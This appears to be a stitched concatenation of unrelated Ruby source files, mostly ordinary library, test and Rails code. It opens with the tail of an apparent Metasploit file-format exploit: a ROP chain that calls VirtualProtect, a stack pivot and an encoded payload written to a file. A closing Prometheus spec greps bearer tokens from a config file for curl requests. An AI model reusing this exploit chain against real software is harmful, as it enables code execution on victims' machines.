        junk,
        junk,
        junk,
        junk,
        junk,
        0x004ac31d, # POP EBX # RETN
        0x00000900,
        0x004a8032, # POP ESI # RETN
        0x00000080,
        0x10009ea7, # ADD EAX,ESI # POP ESI # RETN
        junk,
        0x004def0d, # XCHG EAX,EBP # RETN
        0x004c0145, # POP EAX # RETN
        0x005e0ae0, # VirtualProtect
        0x00408242, # MOV EAX,DWORD PTR DS:[EAX] # RETN
        0x0052001a, # XCHG EAX,ESI # RETN 00
        0x004c0729, # POP EDX # RETN
        0x00000040,
        0x004c0021, # POP ECX # RETN
        0x00401000, # RW
        0x00448142, # POP EDI # RETN
        0x004ae7ce, # RET
        0x004c0145, # POP EAX # RETN
        0x004ae7ce, # RET
        0x0052158e, # PUSHAD # RETN 00
      ].pack("V*")
    # pad to the overwrite offset, then pivot into the ROP chain
    buffer = rand_text(target['OffSet'])
    buffer << pivot
    buffer << rop_gadgets
    buffer << make_nops(100)
    buffer << payload.encoded
    filecontent = header + buffer + footer
    print_status("Writing payload to file")
    file_create(filecontent)
  end
end
| 36.048485 | 94 | 0.594317 |
7a4b15cd71c712e0b3ecdfefd23108adbde74ef7 | 1,223 | # frozen_string_literal: true
require "abstract_unit"
require "active_support/core_ext/array"
require "active_support/core_ext/hash"
# Tests for Array#extract_options!: pops a trailing options hash off an
# argument array, or returns {} when the last element isn't one.
class ExtractOptionsTest < ActiveSupport::TestCase
  # Plain Hash subclass: must NOT be treated as an extractable options hash.
  class HashSubclass < Hash
  end
  # Hash subclass opting in via extractable_options?: MUST be extracted.
  class ExtractableHashSubclass < Hash
    def extractable_options?
      true
    end
  end
  def test_extract_options
    assert_equal({}, [].extract_options!)
    assert_equal({}, [1].extract_options!)
    assert_equal({ a: :b }, [{ a: :b }].extract_options!)
    assert_equal({ a: :b }, [1, { a: :b }].extract_options!)
  end
  def test_extract_options_doesnt_extract_hash_subclasses
    hash = HashSubclass.new
    hash[:foo] = 1
    array = [hash]
    options = array.extract_options!
    # subclass stays in the array; an empty options hash is returned
    assert_equal({}, options)
    assert_equal([hash], array)
  end
  def test_extract_options_extracts_extractable_subclass
    hash = ExtractableHashSubclass.new
    hash[:foo] = 1
    array = [hash]
    options = array.extract_options!
    # opted-in subclass is removed from the array and returned
    assert_equal({ foo: 1 }, options)
    assert_equal([], array)
  end
  def test_extract_options_extracts_hash_with_indifferent_access
    array = [{ foo: 1 }.with_indifferent_access]
    options = array.extract_options!
    assert_equal(1, options[:foo])
  end
end
| 25.479167 | 64 | 0.708913 |
ed0dccdfd0d65d92de4071e9a7f1aac39bd3cd8b | 536 | lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'imgix-optimizer/version'
# Gem packaging metadata for imgix-optimizer.
Gem::Specification.new do |s|
  s.name = 'imgix-optimizer'
  s.version = Imgix::Optimizer::VERSION
  s.authors = ['Sean C Davis']
  s.email = '[email protected]'
  # TODO(review): summary is empty — `gem build` warns about missing
  # summaries; consider adding a one-line description.
  s.summary = ''
  s.homepage = 'https://www.ample.co/'
  s.license = 'MIT'
  s.require_paths = ['lib']
  # ship every git-tracked file
  s.files = `git ls-files`.split($/)
  s.add_development_dependency 'rake'
end
| 29.777778 | 55 | 0.610075 |
f7ed7f6b13dbc6d7265b948d14bd44504019c868 | 2,945 | #--
# Copyright (c) 2005 David Heinemeier Hansson
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#++
module ActiveSupport
  # Forces the lazily-autoloaded components to load by referencing their
  # constants; returns the list of (now loaded) constants.
  def self.load_all!
    [Dependencies, Deprecation, Gzip, MessageVerifier, Multibyte, SecureRandom, TimeWithZone]
  end
  # Each public component is lazy-loaded on first constant reference.
  autoload :BacktraceCleaner, 'active_support/backtrace_cleaner'
  autoload :Base64, 'active_support/base64'
  autoload :BasicObject, 'active_support/basic_object'
  autoload :BufferedLogger, 'active_support/buffered_logger'
  autoload :Cache, 'active_support/cache'
  autoload :Callbacks, 'active_support/callbacks'
  autoload :Deprecation, 'active_support/deprecation'
  autoload :Duration, 'active_support/duration'
  autoload :Gzip, 'active_support/gzip'
  autoload :Inflector, 'active_support/inflector'
  autoload :Memoizable, 'active_support/memoizable'
  autoload :MessageEncryptor, 'active_support/message_encryptor'
  autoload :MessageVerifier, 'active_support/message_verifier'
  autoload :Multibyte, 'active_support/multibyte'
  autoload :OptionMerger, 'active_support/option_merger'
  autoload :OrderedHash, 'active_support/ordered_hash'
  autoload :OrderedOptions, 'active_support/ordered_options'
  autoload :Rescuable, 'active_support/rescuable'
  autoload :SafeBuffer, 'active_support/core_ext/string/output_safety'
  autoload :SecureRandom, 'active_support/secure_random'
  autoload :StringInquirer, 'active_support/string_inquirer'
  autoload :TimeWithZone, 'active_support/time_with_zone'
  autoload :TimeZone, 'active_support/values/time_zone'
  autoload :XmlMini, 'active_support/xml_mini'
end
require 'active_support/version_switches'
require 'active_support/integer_class'
require 'active_support/legacy_methods'
require 'active_support/vendor'
require 'active_support/core_ext'
require 'active_support/vendor_patches'
require 'active_support/dependencies'
require 'active_support/json'
I18n.load_path << "#{File.dirname(__FILE__)}/active_support/locale/en.yml"
| 45.307692 | 93 | 0.800679 |
e9a31bdfe4825ee7f1462c180bb4599244558e7a | 2,066 | # frozen_string_literal: true
module Solargraph
  module Diagnostics
    # Utility methods for the RuboCop diagnostics reporter.
    #
    module RubocopHelpers
      module_function

      # Loads rubocop, preferring the requested gem version; the latest
      # installed version is used when _version_ is `nil`.
      #
      # @param version [String]
      # @raise [InvalidRubocopVersionError] if _version_ is not installed
      def require_rubocop(version = nil)
        begin
          spec = Gem::Specification.find_by_name('rubocop', version)
          lib_dir = File.join(spec.full_gem_path, 'lib')
          $LOAD_PATH.unshift(lib_dir) unless $LOAD_PATH.include?(lib_dir)
        rescue Gem::MissingSpecVersionError => e
          found = e.specs.map { |s| s.version.version }.join(', ')
          raise InvalidRubocopVersionError,
                "could not find '#{e.name}' (#{e.requirement}) - "\
                "did find: [#{found}]"
        end
        require 'rubocop'
      end

      # Builds RuboCop command-line options for checking +code+ as if it
      # lived at +filename+, using JSON output and stdin as the source.
      #
      # @param filename [String]
      # @param code [String]
      # @return [Array(Array<String>, Array<String>)]
      def generate_options filename, code
        cli_args = ['-f', 'j', filename]
        options, paths = RuboCop::Options.new.parse(cli_args)
        options[:stdin] = code
        [options, paths]
      end

      # RuboCop internally uses capitalized drive letters for Windows
      # paths, so lowercase drive prefixes are upcased before handing the
      # path to RuboCop. Non-drive paths pass through untouched.
      #
      # @param path [String]
      # @return [String]
      def fix_drive_letter path
        return path unless path =~ /^[a-z]:/
        "#{path[0].upcase}#{path[1..-1]}"
      end

      # Captures everything written to $stdout while the (optional) block
      # runs and returns it as a string. Mirrors what the RuboCop specs do.
      #
      # @return [String]
      def redirect_stdout
        buffer = StringIO.new
        $stdout = buffer
        yield if block_given?
        $stdout = STDOUT
        buffer.string
      end
    end
  end
end
| 32.28125 | 86 | 0.613262 |
26cb166a579461d4f30db93ffe3f806880c1c03b | 1,015 | desc 'setup', 'Setup a project for the first time'
# Help text shown by `geordi help setup` (heredoc content is user-facing —
# left verbatim).
long_desc <<-LONGDESC
Example: `geordi setup`
Check out a repository and cd into its directory. Then let `setup` do the tiring
work: run `bundle install`, create `database.yml`, create databases, migrate
(all if applicable).
If a local bin/setup file is found, Geordi skips its routine and runs bin/setup
instead.
LONGDESC
# -d/--dump TARGET: after setup, load a dump of the TARGET db into development.
option :dump, type: :string, aliases: '-d', banner: 'TARGET',
  desc: 'After setup, dump the TARGET db and source it into the development db'
# -t/--test: run the test suite once setup has finished.
option :test, type: :boolean, aliases: '-t', desc: 'After setup, run tests'
# Thor task: delegates to a project-local bin/setup when present, otherwise
# runs Geordi's create-databases + migrate routine; then performs the
# optional --dump / --test follow-ups.
def setup
  if File.exist? 'bin/setup'
    Interaction.announce 'Running bin/setup'
    Interaction.note "Geordi's own setup routine is skipped"
    Util.run!('bin/setup')
  else
    invoke_geordi 'create_databases'
    invoke_geordi 'migrate'
  end
  Interaction.success 'Successfully set up the project.'
  invoke_geordi 'dump', options.dump, load: true if options.dump
  invoke_geordi 'tests' if options.test
end
| 30.757576 | 80 | 0.733005 |
382bffcab7f05d33fe2f92e409428a5fa8b4c538 | 738 | require "fileutils"
module MobRotation
  # Flat-file store for the mob roster: one mobster per line, formatted as
  # "Name" or "Name <email>".
  class Database
    # @param filename [String] path of the roster file; created empty when absent
    def initialize(filename)
      @filename = filename
      FileUtils.touch(@filename) unless File.exist?(@filename)
    end

    # Yields each stored entry with surrounding whitespace removed.
    def sanitized_entries_in
      each_database_entry(@filename) { |raw| yield(raw.to_s.strip) }
    end

    # Overwrites the file with one formatted line per mobster.
    def write(mobsters)
      serialized = mobsters.map { |mobster| "#{format_mobster(mobster.name, mobster.email)}\n" }
      File.open(@filename, "w") { |file| file.write(serialized.join) }
    end

    # "Name <email>" when an email is present and non-empty, else just "Name".
    def format_mobster(name, email)
      suffix = (email && !email.empty?) ? " <#{email}>" : ""
      name + suffix
    end

    # Yields every raw line of the file (newlines included).
    def each_database_entry(filename)
      File.readlines(filename).map { |line| yield(line) }
    end
  end
end
| 22.363636 | 69 | 0.630081 |
b9cc05747066d1e53c704b62de4ca3e62f0cb740 | 7,916 | # Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "helper"
# Specs for per-property index exclusion on Google::Cloud::Datastore::Entity,
# covering scalar values, list values, and the Proc/Array forms of
# exclude_from_indexes!.
describe Google::Cloud::Datastore::Entity, :exclude_from_indexes, :mock_datastore do

  # A simple entity with two string properties (indexed by default).
  let(:entity) do
    Google::Cloud::Datastore::Entity.new.tap do |ent|
      ent.key = Google::Cloud::Datastore::Key.new "User", "username"
      ent["name"] = "User McUser"
      ent["email"] = "[email protected]"
    end
  end

  it "converts indexed value to not excluded from a GRPC object" do
    grpc = Google::Datastore::V1::Entity.new
    grpc.key = Google::Datastore::V1::Key.new
    grpc.key.path << Google::Datastore::V1::Key::PathElement.new(kind: "User", id: 123456)
    grpc.properties["name"] = Google::Cloud::Datastore::Convert.to_value "User McNumber"

    entity_from_grpc = Google::Cloud::Datastore::Entity.from_grpc grpc
    entity_from_grpc.exclude_from_indexes?("name").must_equal false
  end

  it "converts indexed list to not excluded from a GRPC object" do
    grpc = Google::Datastore::V1::Entity.new
    grpc.key = Google::Datastore::V1::Key.new
    grpc.key.path << Google::Datastore::V1::Key::PathElement.new(kind: "User", id: 123456)
    grpc.properties["tags"] = Google::Cloud::Datastore::Convert.to_value ["ruby", "code"]

    entity_from_grpc = Google::Cloud::Datastore::Entity.from_grpc grpc
    # List properties report one flag per element.
    entity_from_grpc.exclude_from_indexes?("tags").must_equal [false, false]
  end

  it "doesn't exclude from indexes by default" do
    refute entity.exclude_from_indexes?("name")
    refute entity.exclude_from_indexes?("email")

    grpc = entity.to_grpc
    grpc.properties["name"].exclude_from_indexes.must_equal false
    grpc.properties["email"].exclude_from_indexes.must_equal false
  end

  it "excludes when setting a boolean" do
    entity["age"] = 21
    entity.exclude_from_indexes! "age", true

    entity.exclude_from_indexes?("age").must_equal true

    grpc = entity.to_grpc
    grpc.properties["age"].exclude_from_indexes.must_equal true
  end

  it "excludes when setting a Proc" do
    entity["age"] = 21
    entity.exclude_from_indexes! "age" do |age|
      age > 18
    end

    entity.exclude_from_indexes?("age").must_equal true

    grpc = entity.to_grpc
    grpc.properties["age"].exclude_from_indexes.must_equal true

    # And now the inverse, the Proc evaluates to false

    entity.exclude_from_indexes! "age" do |age|
      age < 18
    end

    entity.exclude_from_indexes?("age").must_equal false

    grpc = entity.to_grpc
    grpc.properties["age"].exclude_from_indexes.must_equal false
  end

  it "excludes when setting an Array on a non array value" do
    entity["age"] = 21
    # For a scalar property only the first element of the Array is used.
    entity.exclude_from_indexes! "age", [true, false, true, false]

    entity.exclude_from_indexes?("age").must_equal true

    grpc = entity.to_grpc
    grpc.properties["age"].exclude_from_indexes.must_equal true

    # And now the inverse, the first value is false

    entity.exclude_from_indexes! "age", [false, true, false, true]

    entity.exclude_from_indexes?("age").must_equal false

    grpc = entity.to_grpc
    grpc.properties["age"].exclude_from_indexes.must_equal false
  end

  describe Array do
    it "doesn't exclude Array values from indexes by default" do
      entity["tags"] = ["ruby", "code"]

      entity.exclude_from_indexes?("tags").must_equal [false, false]

      grpc = entity.to_grpc
      tag_grpc = grpc.properties["tags"]
      # The list property itself is never excluded; flags live per element.
      tag_grpc.exclude_from_indexes.must_equal false
      tag_grpc.array_value.values.map(&:exclude_from_indexes).must_equal [false, false]
    end

    it "excludes an Array when setting a boolean" do
      entity["tags"] = ["ruby", "code"]
      entity.exclude_from_indexes! "tags", true

      entity.exclude_from_indexes?("tags").must_equal [true, true]

      grpc = entity.to_grpc
      tag_grpc = grpc.properties["tags"]
      tag_grpc.exclude_from_indexes.must_equal false
      tag_grpc.array_value.values.map(&:exclude_from_indexes).must_equal [true, true]
    end

    it "excludes an Array when setting a Proc" do
      entity["tags"] = ["ruby", "code"]
      entity.exclude_from_indexes! "tags" do |tag|
        tag =~ /r/
      end

      entity.exclude_from_indexes?("tags").must_equal [true, false]

      grpc = entity.to_grpc
      tag_grpc = grpc.properties["tags"]
      tag_grpc.exclude_from_indexes.must_equal false
      tag_grpc.array_value.values.map(&:exclude_from_indexes).must_equal [true, false]

      # And now the inverse, the Proc evaluates to false

      entity["tags"] = ["ruby", "code"]
      entity.exclude_from_indexes! "tags" do |tag|
        tag =~ /c/
      end

      entity.exclude_from_indexes?("tags").must_equal [false, true]

      grpc = entity.to_grpc
      tag_grpc = grpc.properties["tags"]
      tag_grpc.exclude_from_indexes.must_equal false
      tag_grpc.array_value.values.map(&:exclude_from_indexes).must_equal [false, true]
    end

    it "excludes an Array when setting an Array" do
      entity["tags"] = ["ruby", "code"]
      entity.exclude_from_indexes! "tags", [true, false]

      entity.exclude_from_indexes?("tags").must_equal [true, false]

      grpc = entity.to_grpc
      tag_grpc = grpc.properties["tags"]
      tag_grpc.exclude_from_indexes.must_equal false
      tag_grpc.array_value.values.map(&:exclude_from_indexes).must_equal [true, false]
    end

    it "excludes an Array when setting an Array that is too small" do
      entity["tags"] = ["ruby", "code", "google", "cloud"]
      entity.exclude_from_indexes! "tags", [true, false]

      # the default is to not exclude when the array is too small

      entity.exclude_from_indexes?("tags").must_equal [true, false, false, false]

      grpc = entity.to_grpc
      tag_grpc = grpc.properties["tags"]
      tag_grpc.exclude_from_indexes.must_equal false
      tag_grpc.array_value.values.map(&:exclude_from_indexes).must_equal [true, false, false, false]
    end

    it "excludes an Array when setting an Array that is too big" do
      entity["tags"] = ["ruby", "code"]
      entity.exclude_from_indexes! "tags", [true, false, true, false, true, false]

      entity.exclude_from_indexes?("tags").must_equal [true, false]

      grpc = entity.to_grpc
      tag_grpc = grpc.properties["tags"]
      tag_grpc.exclude_from_indexes.must_equal false
      tag_grpc.array_value.values.map(&:exclude_from_indexes).must_equal [true, false]

      # Now add to the entity and get the previously stored exclude values

      entity["tags"] = ["ruby", "code", "google", "cloud"]

      entity.exclude_from_indexes?("tags").must_equal [true, false, true, false]

      grpc = entity.to_grpc
      tag_grpc = grpc.properties["tags"]
      tag_grpc.exclude_from_indexes.must_equal false
      tag_grpc.array_value.values.map(&:exclude_from_indexes).must_equal [true, false, true, false]
    end
  end

  describe "Edge Cases" do
    it "recalculates when changing from a single value to an array" do
      entity["tags"] = "ruby"

      entity.exclude_from_indexes?("tags").must_equal false

      entity.exclude_from_indexes! "tags", true

      entity.exclude_from_indexes?("tags").must_equal true

      entity["tags"] = ["ruby", "code"]

      # The scalar flag is expanded to cover every element of the new array.
      entity.exclude_from_indexes?("tags").must_equal [true, true]

      entity.exclude_from_indexes! "tags", [false, false]

      entity["tags"] = "ruby"

      entity.exclude_from_indexes?("tags").must_equal false
    end
  end
end
| 32.310204 | 100 | 0.69429 |
7935f26a10115962375e178b296de2f83f121592 | 814 | module OdfCore
module Element
  module Text
    # Model for the <text:note-body> ODF element, which carries the content
    # of a footnote/endnote. Purely declarative: element name, permitted
    # child elements, and (no) attributes.
    class NoteBody < AbstractElement
      XML_ELEMENT_NAME = 'text:note-body'

      # Element names that may appear as direct children of text:note-body.
      CHILDREN = %w[
        dr3d:scene
        draw:a
        draw:caption
        draw:circle
        draw:connector
        draw:control
        draw:custom-shape
        draw:ellipse
        draw:frame
        draw:g
        draw:line
        draw:measure
        draw:page-thumbnail
        draw:path
        draw:polygon
        draw:polyline
        draw:rect
        draw:regular-polygon
        table:table
        text:alphabetical-index
        text:bibliography
        text:change
      ].freeze

      ATTRIBUTES = [].freeze
    end
  end
end
| 21.421053 | 43 | 0.470516 |
087f632fc41c49eb60c48b337f3de4b8ba3c3776 | 1,117 | class CurveCubicsController < ApplicationController
before_action :authenticate_user!
# CanCanCan: load the resource and authorize every action, using our strong
# parameters method when building the record.
load_and_authorize_resource param_method: :curve_cubic_params
before_action :set_curve_cubic, only: [:show, :edit, :update, :destroy]

respond_to :html

# GET /curve_cubics
def index
  @curve_cubics = CurveCubic.all
  respond_with(@curve_cubics)
end

# GET /curve_cubics/:id
def show
  respond_with(@curve_cubic)
end

# GET /curve_cubics/new
def new
  @curve_cubic = CurveCubic.new
  respond_with(@curve_cubic)
end

# GET /curve_cubics/:id/edit — @curve_cubic is set by the before_action.
def edit
end

# POST /curve_cubics
def create
  @curve_cubic = CurveCubic.new(curve_cubic_params)
  @curve_cubic.save
  respond_with(@curve_cubic)
end

# PATCH/PUT /curve_cubics/:id
def update
  @curve_cubic.update(curve_cubic_params)
  respond_with(@curve_cubic)
end

# DELETE /curve_cubics/:id
def destroy
  @curve_cubic.destroy
  respond_with(@curve_cubic)
end

private

# Loads the record referenced by params[:id] for member actions.
def set_curve_cubic
  @curve_cubic = CurveCubic.find(params[:id])
end

# Strong parameters: the cubic-curve name, its four coefficients, and the
# output/variable bounds.
def curve_cubic_params
  params.require(:curve_cubic).permit(:name, :curve_coefficient1, :curve_coefficient2, :curve_coefficient3, :curve_coefficient4, :curve_maximum_out, :curve_maximum_var1, :curve_minimum_out, :curve_minimum_var1)
end
end
| 21.901961 | 212 | 0.752014 |
ed4da581e71560396a24654c982f32a249aa10db | 75 | require "lib/hello_helper"
# Expose HelloHelper's methods inside templates.
helpers HelloHelper

# Render the root page without wrapping it in a layout.
page "/", :layout => false
| 15 | 26 | 0.733333 |
1d4ced60f011da211903cd4de5531410f6de2349 | 335 | class CreateProfiles < ActiveRecord::Migration[5.0]
# Creates the profiles table: one row per user, holding basic biographical
# attributes.
def change
  create_table :profiles do |t|
    t.references :user, foreign_key: true
    t.date :birthday
    # The four simple string attributes, in the original column order.
    %i[birthplace currentplace education occupation].each do |column|
      t.string column
    end
    t.text :bio

    t.timestamps
  end
end
end
| 20.9375 | 51 | 0.638806 |
ac66ab64557ddc8e68d70f29dd82bd6f7b0eaca6 | 65 | class Entrylog < ApplicationRecord
  # Persist the content attribute as a JSON-encoded string in its column.
  serialize :content, JSON
end
| 16.25 | 34 | 0.815385 |
7ad97665deff50fb360aedad20ddb6528f4da658 | 1,177 | module ErlangConfig
# Wraps a raw Erlang term string and decodes it into a Ruby value.
class ErlTerm
  attr_accessor :str

  # @param str [String] raw Erlang term text
  def initialize(str)
    @str = str
  end

  # Decode an Erlang term literal into a Ruby object.
  #
  # Unquoted scalars become Integer, Float, or Symbol; delimited terms are
  # wrapped in the matching Erl* class chosen by their opening token.
  #
  # @param str [String]
  # @raise [RuntimeError] when the input is not a recognisable Erlang term
  def self.decode(str)
    str = str.strip # was strip!: don't mutate the caller's string
    term_open_str = str[/^(\[|\{|\"|\'|<<|#Ref|<)/, 1]
    if term_open_str.nil? # integer, float, or, atom
      matches = /^(([-0-9\.]+)|([a-z][a-z0-9_]*))/.match(str)
      # Previously a non-matching scalar crashed with NoMethodError on nil.
      raise "Parse error, Invalid erlang term #{str}" if matches.nil?
      term = case
             when (matches[2] && str[/\./]) then str.to_f
             when matches[2] then str.to_i
             when matches[3] then str.to_sym
             end
    else
      term_close_str = ERL_CLOSE_STRS[term_open_str]
      re_ends_with_close_str = Regexp.new(Regexp.escape("#{term_close_str}") + "$")
      raise "Parse error, Invalid erlang term #{str}" unless re_ends_with_close_str.match(str)
      # '<<' is listed before '<' in the open-token regexp, so binaries win
      # over pids here.
      term = case term_open_str
             when '[' then ErlList.new(str)
             when '{' then ErlTuple.new(str)
             when '"' then ErlString.new(str)
             when "'" then ErlAtom.new(str)
             when "<<" then ErlBinary.new(str)
             when "#Ref" then ErlRef.new(str)
             when "<" then ErlPid.new(str)
             else raise "Parse error with #{term_open_str}"
             end
    end
    term
  end
end
end
| 31.810811 | 96 | 0.562447 |
ed9923bbd1497074748db8980aa26aa6052a52fe | 12,649 | require 'spec_helper'
# Endpoints under test; the spec runs on the monitoring host itself.
prometheus_host = 'localhost'
prometheus_port = 9090
kube_apiserver_secure_port = 6443
alertmanager_host = 'localhost'
alertmanager_port = 9093

describe 'Checking if Prometheus user exists' do
  describe group('prometheus') do
    it { should exist }
  end

  describe user('prometheus') do
    it { should exist }
    it { should belong_to_group 'prometheus' }
    # Service account: no interactive login allowed.
    it { should have_login_shell '/usr/sbin/nologin' }
  end
end

describe 'Checking Prometheus directories and files' do
  let(:disable_sudo) { false }

  describe file('/var/lib/prometheus') do
    it { should exist }
    it { should be_a_directory }
    it { should be_owned_by 'prometheus' }
    it { should be_grouped_into 'prometheus' }
  end

  describe file('/etc/prometheus') do
    it { should exist }
    it { should be_a_directory }
    it { should be_owned_by 'root' }
    it { should be_grouped_into 'prometheus' }
  end

  describe file("/etc/prometheus/prometheus.yml") do
    it { should exist }
    it { should be_a_file }
    it { should be_readable }
  end
end

describe 'Checking if Prometheus service is running' do
  describe service('prometheus') do
    it { should be_enabled }
    it { should be_running }
  end
end

describe 'Checking if the ports are open' do
  describe port(prometheus_port) do
    let(:disable_sudo) { false }
    it { should be_listening }
  end
end

describe 'Checking Prometheus health' do
  # The web UI should answer 200, and the readiness/liveness endpoints
  # should report their fixed status strings.
  describe command("curl -o /dev/null -s -w '%{http_code}' #{prometheus_host}:#{prometheus_port}/graph") do
    it "is expected to be equal" do
      expect(subject.stdout.to_i).to eq 200
    end
  end
  describe command("curl #{prometheus_host}:#{prometheus_port}/-/ready") do
    its(:stdout) { should match /^Prometheus is Ready.$/ }
  end
  describe command("curl #{prometheus_host}:#{prometheus_port}/-/healthy") do
    its(:stdout) { should match /^Prometheus is Healthy.$/ }
  end
end

describe 'Checking if Prometheus is serving metrics about itself' do
  describe command("curl -o /dev/null -s -w '%{http_code}' #{prometheus_host}:#{prometheus_port}/metrics") do
    it "is expected to be equal" do
      expect(subject.stdout.to_i).to eq 200
    end
  end
  describe command("curl #{prometheus_host}:#{prometheus_port}/metrics") do
    its(:stdout) { should_not match /^$/ }
  end
end
# NOTE(review): listInventoryHosts is presumably a helper from the test
# harness returning the inventory hostnames for a group — confirm.
describe 'Checking configuration files for Node exporter' do
  listInventoryHosts("node_exporter").each do |val|
    describe command("ls /etc/prometheus/file_sd") do
      let(:disable_sudo) { false }
      its(:stdout) { should match /node-#{val}.yml/ }
    end
  end
end

describe 'Checking connection to Node Exporter hosts' do
  listInventoryHosts("node_exporter").each do |val|
    let(:disable_sudo) { false }
    # The grep extracts the scrape target address from the file_sd config,
    # then curl checks the exporter's /metrics endpoint answers 200.
    describe command("curl -o /dev/null -s -w '%{http_code}' $(grep -oP \"(?<=targets: \\\[\').*(?=\'\\\])\" /etc/prometheus/file_sd/node-#{val}.yml)/metrics") do
      it "is expected to be equal" do
        expect(subject.stdout.to_i).to eq 200
      end
    end
  end
end

describe 'Checking configuration files for HAProxy Exporter' do
  listInventoryHosts("haproxy_exporter").each do |val|
    describe command("ls /etc/prometheus/file_sd") do
      let(:disable_sudo) { false }
      its(:stdout) { should match /haproxy-#{val}.yml/ }
    end
  end
end

describe 'Checking connection to HAProxy Exporter hosts' do
  listInventoryHosts("haproxy_exporter").each do |val|
    let(:disable_sudo) { false }
    # Same extraction as above, but haproxy configs quote targets with
    # double quotes instead of single quotes.
    describe command("curl -o /dev/null -s -w '%{http_code}' $(grep -oP \"(?<=targets: \\\[\\\").*(?=\\\"\\\])\" /etc/prometheus/file_sd/haproxy-#{val}.yml)/metrics") do
      it "is expected to be equal" do
        expect(subject.stdout.to_i).to eq 200
      end
    end
  end
end

describe 'Checking configuration files for JMX Exporter' do
  listInventoryHosts("jmx-exporter").each do |val|
    describe command("ls /etc/prometheus/file_sd") do
      let(:disable_sudo) { false }
      its(:stdout) { should match /kafka-jmx-#{val}.yml/ }
      its(:stdout) { should match /zookeeper-jmx-#{val}.yml/ }
    end
  end
end

describe 'Checking connection to JMX Exporter hosts' do
  listInventoryHosts("jmx-exporter").each do |val|
    let(:disable_sudo) { false }
    describe command("curl -o /dev/null -s -w '%{http_code}' $(grep -oP \"(?<=targets: \\\[\').*(?=\'\\\])\" /etc/prometheus/file_sd/kafka-jmx-#{val}.yml)/metrics") do
      it "is expected to be equal" do
        expect(subject.stdout.to_i).to eq 200
      end
    end
    describe command("curl -o /dev/null -s -w '%{http_code}' $(grep -oP \"(?<=targets: \\\[\').*(?=\'\\\])\" /etc/prometheus/file_sd/zookeeper-jmx-#{val}.yml)/metrics") do
      it "is expected to be equal" do
        expect(subject.stdout.to_i).to eq 200
      end
    end
  end
end

describe 'Checking configuration files for Kafka Exporter hosts' do
  listInventoryHosts("kafka-exporter").each do |val|
    describe command("ls /etc/prometheus/file_sd") do
      let(:disable_sudo) { false }
      its(:stdout) { should match /kafka-exporter-#{val}.yml/ }
    end
  end
end

describe 'Checking connection to Kafka Exporter hosts' do
  listInventoryHosts("kafka-exporter").each do |val|
    let(:disable_sudo) { false }
    describe command("curl -o /dev/null -s -w '%{http_code}' $(grep -oP \"(?<=targets: \\\[\').*(?=\'\\\])\" /etc/prometheus/file_sd/kafka-exporter-#{val}.yml)/metrics") do
      it "is expected to be equal" do
        expect(subject.stdout.to_i).to eq 200
      end
    end
  end
end
# The bearer token for the API server is read from the corresponding scrape
# job in prometheus.yml, then reused to query the secured endpoints directly.
describe 'Checking connection to Kubernetes API server' do
  listInventoryHosts("master").each do |val|
    let(:disable_sudo) { false }
    describe command("curl -o /dev/null -s -w '%{http_code}' -k -H \"Authorization: Bearer $(grep -A 3 kubernetes-apiservers /etc/prometheus/prometheus.yml \
    | awk '/bearer_token/ {print $2}')\" https://#{val}:#{kube_apiserver_secure_port}/metrics") do
      it "is expected to be equal" do
        expect(subject.stdout.to_i).to eq 200
      end
    end
  end
end

describe 'Checking connection to Kubernetes cAdvisor' do
  let(:disable_sudo) { false }
  # cAdvisor metrics for every node (masters and workers) are proxied
  # through each master's API server.
  listInventoryHosts("master").each do |val_m|
    describe command("curl -o /dev/null -s -w '%{http_code}' -k -H \"Authorization: Bearer $(grep -A 3 kubernetes-cadvisor /etc/prometheus/prometheus.yml \
    | awk '/bearer_token/ {print $2}')\" https://#{val_m}:#{kube_apiserver_secure_port}/api/v1/nodes/#{val_m}/proxy/metrics/cadvisor") do
      it "is expected to be equal" do
        expect(subject.stdout.to_i).to eq 200
      end
    end
    listInventoryHosts("worker").each do |val_w|
      describe command("curl -o /dev/null -s -w '%{http_code}' -k -H \"Authorization: Bearer $(grep -A 3 kubernetes-cadvisor /etc/prometheus/prometheus.yml \
      | awk '/bearer_token/ {print $2}')\" https://#{val_m}:#{kube_apiserver_secure_port}/api/v1/nodes/#{val_w}/proxy/metrics/cadvisor") do
        it "is expected to be equal" do
          expect(subject.stdout.to_i).to eq 200
        end
      end
    end
  end
end

describe 'Checking connection to Kubernetes nodes' do
  let(:disable_sudo) { false }
  listInventoryHosts("master").each do |val_m|
    describe command("curl -o /dev/null -s -w '%{http_code}' -k -H \"Authorization: Bearer $(grep -A 3 kubernetes-nodes /etc/prometheus/prometheus.yml \
    | awk '/bearer_token/ {print $2}')\" https://#{val_m}:#{kube_apiserver_secure_port}/api/v1/nodes/#{val_m}/proxy/metrics") do
      it "is expected to be equal" do
        expect(subject.stdout.to_i).to eq 200
      end
    end
    listInventoryHosts("worker").each do |val_w|
      describe command("curl -o /dev/null -s -w '%{http_code}' -k -H \"Authorization: Bearer $(grep -A 3 kubernetes-nodes /etc/prometheus/prometheus.yml \
